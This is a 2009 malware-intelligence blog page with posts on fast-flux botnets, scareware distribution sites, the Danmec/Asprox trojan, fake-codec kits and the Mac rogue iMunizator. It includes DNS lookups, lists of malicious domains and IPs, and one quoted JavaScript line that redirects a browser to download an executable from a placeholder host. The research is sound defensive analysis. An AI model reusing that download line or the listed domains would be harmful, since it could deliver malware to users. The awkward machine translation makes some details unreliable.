MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

31.1.09

Monthly compendium of information. January 2009

Pistus Malware Intelligence Blog
30.01.09
Understanding Fast-Flux networks

29.01.09
New strategy to disseminate scareware IS

28.01.09
Danmec Bot, Fast-Flux networks and recruitment of ...

27.01.09 Deception techniques that do not go out of style
26.01.09 Attacking Mac systems through false security tool
24.01.09 Massive exploitation of vulnerabilities through ghost
21.01.09
Schematic analysis of an attack from Web-based malware

17.01.09 A recent tour of scareware II
15.01.09
Malware attack via Drive-by-Download

12.01.09 Security "electronics" and spreading malware
06.01.09 A recent tour of scareware
04.01.09
State security according to Microsoft

01.01.09 Malware preinstalled


Evilfingers Blog
31.01.09 Electronic security and spread of malware
30.01.09 Understanding Fast-Flux networks

29.01.09 New strategy of social engineering to spread IE Defender
28.01.09 Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs
27.01.09 Deception techniques that do not go out of fashion
26.01.09 Attacking Mac systems through false security tool
25.01.09 Massive servers through exploitation of vulnerabilities ghosts
19.01.09 Vulnerabilities & Proofs-of-concept
14.01.09 via Internet Malware Attack
14.01.09 malware attacks through web sites

10.01.09 Security in web browsers
09.01.09 commonly exploited security weaknesses

ESET Latinoamérica Blog (Spanish)
29.01.09 How to install Ubuntu Linux Security ESET
27.01.09 Fake pages created to spread malware with fake codecs
20.01.09 Phishing attack through Win32/Qhost
15.01.09 Creator of fake web browsers
14.01.09 History of the malicious code
09.01.09 Conficker and security issues surrounding
08.01.09 Insecure Internet activity. Threat of virus attack
07.01.09 Drive-by-Download: another wolf in sheep's clothing
05.01.09 New course promoting false
01.01.09 Dec. Threat Report

30.12.08 Malicious Manager wallpapers
29.12.08 Malicious anti-analysis techniques
28.12.08 Social Engineering everyday
22.12.08 Learning about malware
17.12.08 Pharming local local banks in Mexico
14.12.08 Prevention against exploitation of vulnerabilities in IE
12.12.08 Malware for Dummies (virus genus)
11.12.08 McDonald's False email with malware
03.12.08 Configuring NOD32 Antivirus on MSN II

Jorge Mieres

Ver más

30.1.09

Understanding Fast-Flux networks

Networks Fast-Flux are an advanced methodology in the spread of threats which is currently actively exploited to infect computers, among many other crimes. The aim is to hide malicious activity through IP addresses that are rotated in seconds against the same domain, making it impossible to locate them to prevent identification block.

Each of these IP addresses that are assigned to the domains correspond to machines that have previously been involved with malicious code, as part of a botnet, and work as a bridge between the computer requesting a specific resource and the server hosting the resource. This method of operation of the network is called a Single-Flux (flow only).

That is, in a normal process, a client computer makes a request (GET) to the server responds to the client who then offer the result, in single-flux networks, the original request made by the client does not bounce against the server but does against the zombie machine, and it is this that makes the query to the server.

There is another methodology called Double-Flux (double flow) in which, besides contemplating the characteristics of single-flux, exploits the name resolution and registration services for domain names.


Through a simple DNS query against a domain is possible to establish whether this is part of a Fast-Flux network. In the following example which shows the different IP addresses down to the domain www.lijg.ru.

;; QUESTION SECTION:
; www.lijg.ru. IN A

;; ANSWER SECTION:
www.lijg.ru. 600 IN A 24,107,209,119
www.lijg.ru. 600 IN A 24,219,191,246
www.lijg.ru. 600 IN A 65.65.208.223
www.lijg.ru. 600 IN A 65.102.56.213
www.lijg.ru. 600 IN A 67,141,208,227
www.lijg.ru. 600 IN A 68.124.161.76
www.lijg.ru. 600 IN A 69.14.27.151
www.lijg.ru. 600 IN A 70.251.45.186
www.lijg.ru. 600 IN A 71.12.89.105
www.lijg.ru. 600 IN A 71.235.251.99
www.lijg.ru. 600 IN A 75.11.10.101
www.lijg.ru. 600 IN A 75.75.104.133
www.lijg.ru. 600 IN A 97.104.40.246
www.lijg.ru. 600 IN A 173.16.99.131

;; AUTHORITY SECTION:
lijg.ru. 345,600 IN NS ns5.lijg.ru.
lijg.ru. 345,600 IN NS ns1.lijg.ru.
lijg.ru. 345,600 IN NS ns2.lijg.ru.
lijg.ru. 345,600 IN NS ns3.lijg.ru.
lijg.ru. 345,600 IN NS ns4.lijg.ru.


On the other hand, they say a picture is worth a thousand words so ... see that tells us the following, obtained from SecViz and performed by JaimeBlasco:

The representation of Fast-Flux networks through graphical tools is an excellent alternative since it allows, through a single view, know from the structural point of view and very attractive how that network is composed.

In this example, the Figure shows a series of Fast-Flux domains (blue) and each of the zombie PCs that make it up (red). When done the triangulation of each of the domains infected, we noticed that some belong to multiple networks within a single FF network structure.

This enables greater advantage for the attacker because it has a much broader array of compromised machines that are used in a distributed way to spread more malware to propagate more spam, do as many phishing attacks, and many other activities malicious and fraudulent.

Jorge Mieres

Ver más

29.1.09

New strategy to disseminate scareware IS

IE Defender is one among many false security programs (scareware, also called rogue) that constantly bombard users with intent to infect their computers through Web sites that pretend to be legitimate.

However, there are detecting new strategies for dissemination and deceit don't share the same methodology for download from the same website scareware, but who seek to trick users to achieve their goals, in this case, IE Defender is being spread to through websites that promise to download mp3 music and movies.

In either case, you download the album or movie downloads but promised one of the variants in the family of IE Defender.

All pages used to spread threats share the same IP address (216.240.151.112) for Download:

free-games-rapidshare. com
movie-rapidshare. com
moviesrapidshare. org
music-rapidshare. com
musicrapidshare. org
warez-catalog. com
movie-megaupload. com
cpmusicpub. com
soft-rapidshare. net
softrapidshare. com
softrapidshare. org
ftp-warez. org
extra-turbo. com
softupdate09. com
cpmusicpub. com
free-full. com
free-full-download.com
free-full-rapidshare.com

A minor detail not identifying these malicious sites is that they simulate almost all pages hosted on sites that allow you to store files like Megaupload, Rapidshare or directly, sites designed for downloading warez.

Related information:
A recent tour of scarewawe II
A recent tour of scarewawe

Jorge Mieres

Ver más

28.1.09

Danmec Bot, Fast-Flux networks and recruitment of Zombies PCs

Danmec or Asprox, is the name of a trojan designed to recruit zombie machines while collecting confidential information from each of the victims it infects.

While the emergence of this trojan isn't new, now uses more complex strategies than those usually used by other malicious code, including its early variants, as techniques Fast-Flux to avoid detection by blocking programs and infect as many computers aspossible.

Currently, the networks Fast-Flux and massively exploited actively by thousands of Russian origin domains, activating again as that created by botnets Danmec.

google-analitycs.lijg. ru
fmkopswuzhj. biz
fnygfr. com

fvwugekf. info

fwkbt. info

gbrpn. org

gbxpxugx. org

ghtileh. biz

gnyluuxneo. com

fuougcdv. org

www. dbrgf. ru

www. bnmd. kz

www. nvepe. ru

www. mtno. ru

www. wmpd. ru

www. msngk6. ru

www. vjhdo. com

www. aspx37. I
google-analitycs.dbrgf. ru

www. advabnr. com

www. lijg. ru

www. dft6s. kz


Each of these domains hosting the following script, written in JavaScript, called script.js (MD5:ccec2c026a38ce139c16ae97065ccd91), from which runs a Drive-by-Download:

This call through the iframe tag is made to a URL that is part of a network active Fast-Flux.

; google-analitycs.lijg.ru. IN A

;; ANSWER SECTION:
google-analitycs.lijg.ru. 600 IN A 68.119.39.129
google-analitycs.lijg.ru. 600 IN A 69.176.46.57
google-analitycs.lijg.ru. 600 IN A 71.12.89.233
google-analitycs.lijg.ru. 600 IN A 76.73.237.59
google-analitycs.lijg.ru. 600 IN A 97.104.40.246
google-analitycs.lijg.ru. 600 IN A 98,194,180,179
google-analitycs.lijg.ru. 600 IN A 146.57.249.100
google-analitycs.lijg.ru. 600 IN A 151,118,186,131
google-analitycs.lijg.ru. 600 IN A 165.166.236.74
google-analitycs.lijg.ru. 600 IN A 173.16.99.131
google-analitycs.lijg.ru. 600 IN A 173.17.180.79
google-analitycs.lijg.ru. 600 IN A 24,107,209,119
google-analitycs.lijg.ru. 600 IN A 24,170,188,201
google-analitycs.lijg.ru. 600 IN A 68.93.61.194

;; AUTHORITY SECTION:
lijg.ru. 339,897 IN NS ns3.lijg.ru.
lijg.ru. 339,897 IN NS ns2.lijg.ru.
lijg.ru. 339,897 IN NS ns1.lijg.ru.
lijg.ru. 339,897 IN NS ns5.lijg.ru.
lijg.ru. 339,897 IN NS ns4.lijg.ru.

;; Query time: 263 msec
;; SERVER: 192.168.240.2 # 53 (192.168.240.2)
;; WHEN: Sun Jan 25 20:31:57 2009
;; MSG SIZE rcvd: 356


While each of the lines set out above web addresses are a new farm networks Fast-Flux with IP group mirrors.

Fast-Flux is an advanced technique used for malicious purposes, together with others, for the propagation of hazards. This forces them to be cautious at all times.

Jorge Mieres

Ver más

27.1.09

Deception techniques that do not go out of style

Are we children of rigor?

One issue that motivates some reflection journal is why people are still falling into traps and known by others.

Techniques of Social Engineering as double extension files, spaces between the file name and extension and, since he began using the Internet as a platform to attack, techniques such as fake codecs are a small sample of some of them.

Web sites that host pornography are often the most visited on the Internet and also the most used by disseminators of malware to propagate threats. And as much as we ask how can it be possible that users still continue to infect their computers through these strategies of deception, the answer appears to reside in something so simple to justify as "a high percentage of demand" for the consumption of such material as one of the most wanted.

Malware creators are well aware that the thing is, and that the person who visits a pornographic site, wants to see pornography, regardless of the format in which the appeal is lodged (video and / or image) and consequently, if that user is offering the download of one or even several, false codecs needed to view this video course, it's likely that in most cases, users download them.

So will display something similar to that shown in the catch, which take a few seconds to display a window pop-ups like the following:

The user, thinking that this is a codec required for viewing the video, it installs. In fact, what is a malware installed, until today's date only detected by some antivirus companies.

On the other hand, there is an application CONSTITUTE only by an HTML file that is used to propagate massively, and through any medium such actions.

The applicative can not create or modify but allows malicious code to spread them through the classic manner set forth above. The only requirement is hosted on a server (or any zombie PC) file HTML in your code and specify the direction of download malware onto the next portion of code.

window.setTimeout ( "location.href = 'http://servidor.com/archivo.exe'", 1000);

As additional components, the kit also proposes to redirect the display of a real video. This is part of the strategy for social engineering and dispel any suspicion by the user.

We do not talk only of techniques such as Drive-by-Download, exploit, scripting. Obfuscation of code, among many others, but we talked about caution and common sense.

That is, not enough to rely only security against the dangers of malicious code and antivirus solutions, in this case and according to the report of VT, AV we currently offer only a 35.09% protection, where only 14 of 39 detect the threat, the other 64.91% will depend considerably on our ability and common sense to detect potential malicious activity.

Jorge Mieres

Ver más

26.1.09

Attacking Mac systems through false security tool

Who said it was for windows?

While it's true that the massiveness of the various techniques of deception and infection are extremely common on Windows platforms, security is the responsibility of any system, regardless of infrastructure or platform, so there are threats from rogue type (also called scareware) for Mac systems

In this case, the recent fake security tool called iMunizator (actually not so recent, as their first steps made during 2007 and early 2008, but returned to the "load" again), can be downloaded from different websites that respond to a single IP address (67.205.75.10) hosted in Ukraine, a web hosting company called iWeb Technologies Inc.

www. imunizator. com
www. imunizator. net
imunizator. com
imunizator. net
mac-imunizator. net

This malware shared "web space" with other rogue much better known through the IP 70.38.19.203:

Antispyware Deluxe (AntiSpywareDeluxe. Com)
Antivirus 2009 (antivirus-2009-pro. Net)
Antivirus 2010 (av2010. Net)
Vista Antivirus 2008 (vav-2008. Net)

iMunizator is also developing strategies of deception for some time, changing domains to raise, even changing its name (formerly MacSweeper).

A more interesting fact is that the stock transfer funds to "buy" the wrong tool is done through a company called Plimus e-commerce, completely legal of Israeli origin but with centralized offices in USA (San Diego and Silicon Valley) and in Ukraine. That is why users will see in the address bar secure HTTPS protocol present in every recommendation and other guidelines which aim to provide security by showing that we are operating from a trusted site.

The current malware constantly seeking sensitive information from users for fraud where a high percentage of sufferers spread windows platforms, but this means that malware writers are turning to look toward new goals. Consequently, we must handle the same good security practices regardless of technology to which it applies.

Related information
A recent tour of scareware II
A recent tour of scareware

Jorge Mieres

Ver más